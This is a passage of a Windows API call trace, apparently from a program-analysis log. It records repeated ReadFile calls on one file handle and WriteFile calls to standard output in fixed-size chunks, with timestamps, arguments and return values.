lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.117] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.117] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] GetFileType (hFile=0x4c) returned 0x1 [0094.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.118] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.118] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] GetFileType (hFile=0x4c) returned 0x1 [0094.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.119] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.119] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] GetFileType (hFile=0x4c) returned 0x1 [0094.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.119] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] GetFileType (hFile=0x4c) returned 0x1 [0094.120] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.120] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.120] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.121] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.121] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.122] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.122] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.122] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.123] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.123] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.123] GetFileType (hFile=0x4c) returned 0x1 [0094.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.124] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.124] GetFileType (hFile=0x4c) returned 0x1 [0094.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.124] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.205] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.205] GetFileType (hFile=0x4c) returned 0x1 [0094.205] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.205] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.205] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.205] GetFileType (hFile=0x4c) returned 0x1 [0094.205] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.205] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.205] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.206] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.206] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] GetFileType (hFile=0x4c) returned 0x1 [0094.206] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.206] WriteFile (in: 